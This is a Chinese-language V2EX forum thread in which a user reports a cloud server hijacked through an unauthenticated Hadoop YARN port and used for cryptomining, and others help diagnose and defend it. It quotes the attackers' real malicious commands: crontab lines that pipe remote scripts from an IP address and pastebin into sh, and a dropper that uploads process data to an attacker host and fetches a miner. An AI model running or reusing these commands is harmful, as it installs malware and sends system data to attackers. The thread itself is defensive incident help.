攻击别人服务器是怎么搞的啊

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

Distributions

Ubuntu

Fedora

CentOS

中文资源站

网易开源镜像站

这是一个创建于 2560 天前的主题，其中的信息可能已经有所发展或是发生改变。

我都关了 root 登录关闭了密码登录只允许秘钥登录最后好像还是让某位大哥从 8088 进去了好像？ cpu 100%(就是一个阿里云的学生机而已，这点性能也要搞我) crontab 里面给我加了个每秒执行的 wget ,

- - - - wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
        具体意思我就看不太懂了就知道去给我 wget 下了一个脚本吧

问问老哥们怎么防啊。我去阿里云安全组设置规则端口地址段访问的时候说最多支持一组授权对象(离开家门之后网络就变了想有多个 ip 可以访问这个阿里云机器)。没搞好。然后现在就是直接 firewall 把 8088 关了。20 分钟了还没出事。没关端口之前是 10~15 分钟就会出问题。

这个 firewall 和安全组能特定多个 ip 访问端口吗？还有啊有没有办法把这个搞我的地址弄出来啊然后顺便加个排除他 ip 之类的

wget

firewall

端口

34 条回复 2018-11-23 00:17:55 +08:00

WordTian

2018-10-13 22:55:30 +08:00 via Android

cpu 百分百？那估计是挖矿脚本

估计你在 8088 端口启的服务有漏洞

choice4

2018-10-13 22:59:28 +08:00

#!/bin/bash

ps ax --sort=-pcpu > /tmp/tmp2.txt
#netstat -antp > /tmp/tmp2.txt
#crontab -l > /tmp/tmp2.txt
#ps -eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt
#top -c -n 1 -b > /tmp/tmp.txt
curl -F "file=@/tmp/tmp2.txt" http://46.249.38.186/rep.php
rm -rf /tmp/tmp2.txt

LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi

if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
$LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh
else
pwd
fi

这可能是那个脚本

choice4

2018-10-13 23:00:30 +08:00

@WordTian 你好请问有办法限制 ip 吗？我搞了一会搞不好直接关了 8088 我这边好多也不方便了

choice4

2018-10-13 23:01:16 +08:00

以前没在意过这些安全组都是直接地址段访问然后 0.0.0.0/0
这会有点难受了

ech0x

2018-10-13 23:03:09 +08:00 via iPhone

你是要跑什么东西？还是去好好补补安全常识吧，直接 0.0.0.0/0 也是心大。

t6attack

2018-10-13 23:07:38 +08:00

有漏洞就抓紧补上。留着漏洞，只限 IP，这是什么操作？

watzds

2018-10-13 23:20:51 +08:00 via Android

哈哈，这点性能也要搞我

两年多前我遇到这种情况是因为 redis 没密码，看看有什么漏洞

WordTian

2018-10-13 23:29:31 +08:00 via Android

https://bitbucket.org/okjh6t37/mygit/raw/master/x_64
这个是实际执行的二进制文件，看着像门罗币的挖矿病毒 xmrig

我之前开 aria2c 没设密钥的时候也中过一回类似的东西，你还是排查下对外开启的服务吧，看看有哪个可能有漏洞的，话说你 8088 开的什么服务啊

限制 ip 的话，你先看看安全组有没相关的设置吧，有的话用那个就行。
如果有经验的话，可以用 iptables。不行的话用 /etc 下的 host.allow，host.deny 也可以试试

choice4

2018-10-13 23:31:43 +08:00

@WordTian 8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞最开始好像是个俄罗斯黑客发现并利用的漏洞，目前还在继续找解决办法

choice4

2018-10-13 23:32:13 +08:00

@watzds 确实好像是一个服务有漏洞

zhexi

2018-10-14 00:25:06 +08:00 via Android

iptables 或者 firewall 屏蔽不得行？

biglee0304

2018-10-14 00:41:20 +08:00 via iPhone

看着的确是挖矿的

Greenm

2018-10-14 01:40:02 +08:00 via iPhone

Hadoop yarn 吧，这个应该是未添加认证，可以直接执行的，加个口令或者限制在内网。

h3lica

2018-10-14 02:05:47 +08:00 via iPhone

一般都是脚本刷漏洞的…别人也不是专门入侵你一个…

LeonKennedy

2018-10-14 08:42:02 +08:00

曾经我每次 ssh 登陆上，好几千的失败登陆。后来我改了端口号，清净了

likuku

2018-10-14 10:32:08 +08:00 via iPhone

@choice4 不是对外公有服务，那就 ssh is 端口外都关闭，需要访问其它服务，装平装 openvpn，或者 ssh 端口映射到本地。

choice4

2018-10-14 11:22:19 +08:00

@likuku 就是说不管这些人是通过什么方式入侵最后都是通过 ssh 吗 ssh 端口我倒是没改只是禁了 root 和密码登录，我搜索到的是说我 8088 跑的东西有一些安全机制的问题，后台的版本修复了。但是我用的那个版本较低，还是有这个漏洞的。老哥我已经好几个问题看见你帮我了 /笑哭多谢多谢

likuku

2018-10-14 11:27:18 +08:00

@choice4 ssh 端口无所谓，只允许 key 认证 + 禁止 root 登陆就行了（个人观点)，#18 我意思是 ss 之外其它端口干脆都禁掉，需要用的话，利用 openvpn (当然要仅对允许的访客 IP 开端口，当然要使用证书连接)，或者 ssh 端口映射本地。

另外，系统已经被爆(橘)，受到污染的情况下，最好是备份好数据和能信任的干净配置信息前提下，干掉系统重装+更新+防火期了事。

choice4

2018-10-14 11:31:47 +08:00

@Greenm 是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件不过 property 里面好像有些变量在对号

choice4

2018-10-14 11:31:58 +08:00

@likuku 好

liangzi

2018-10-14 12:52:45 +08:00

46.249.38.186 防火墙屏蔽一下不行吗？这个机器是”大便“的开 22 口了

hdonghong

2018-10-14 15:44:22 +08:00

兄弟怎么解决的。。我也是 crontab 显示：*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh

终止后仍然是 cpu100%

realkenshinji

2018-10-14 16:34:28 +08:00 via iPhone

@likuku 学习了

choice4

2018-10-14 17:53:36 +08:00

@hdonghong 我这会就是直接把 8088 关了就没事了。你这个跟我这个是不是一样我不清楚啊。我这个是因为 8088 的一个服务有安全漏洞。然后脚本什么的应该就是通过 8088 植入的我把 8088 关了就好了。具体你根据你自己的实际情况来。不行就把先把 crontab 弄掉。然后把你自定义的防火墙规则全关了得了。再一步一步排查